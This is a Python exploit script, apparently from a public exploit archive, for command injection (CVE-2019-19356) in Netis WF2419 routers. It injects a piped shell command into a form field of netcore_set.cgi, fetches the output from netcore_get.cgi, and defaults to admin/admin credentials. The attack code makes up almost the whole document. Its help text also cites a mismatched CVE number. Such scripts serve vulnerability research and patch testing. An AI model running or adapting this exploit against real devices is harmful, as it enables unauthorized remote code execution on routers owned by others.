# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution # Exploit Author: Elias Issa # Vendor Homepage: http://www.netis-systems.com # Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75 # Date: 2020-02-11 # Version: WF2419 V2.2.36123 => V2.2.36123 # Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123 # CVE : CVE-2019-19356 # Proof of Concept: python netis_rce.py "ls" #!/usr/bin/env python import argparse import requests import json def exploit(host,cmd): # Send Payload headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', 'Content-Type': 'application/x-www-form-urlencoded'} post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0" vulnerable_page = host + "/cgi-bin-igd/netcore_set.cgi" req_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value) print('[+] Payload sent') try : json_data = json.loads(req_payload.text) if json_data[0] == "SUCCESS": print('[+] Exploit Sucess') # Get Command Result print('[+] Getting Command Output\n') result_page = host + "/cgi-bin-igd/netcore_get.cgi" post_data = "mode_name=netcore_get&no=no" req_result = requests.post(result_page, data=post_data, headers=headers_value) json_data = json.loads(req_result.text) results = json_data["tools_results"] print results.replace(';', '\n') else: print('[-] Exploit Failed') except: print("[!] You might need to login.") # To be implemented def login(user, password): print('To be implemented') def main(): host = args.host cmd = args.cmd user = args.user password = args.password #login(user,password) exploit(host,cmd) if __name__ == "__main__": ap = argparse.ArgumentParser( description="Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]") ap.add_argument("host", help="URL (Example:") ap.add_argument("cmd", help="Command to run.") ap.add_argument("-u", "--user", help="Admin username (Default: admin).", default="admin") ap.add_argument("-p", "--password", help="Admin password (Default: admin).", default="admin") args = ap.parse_args() main()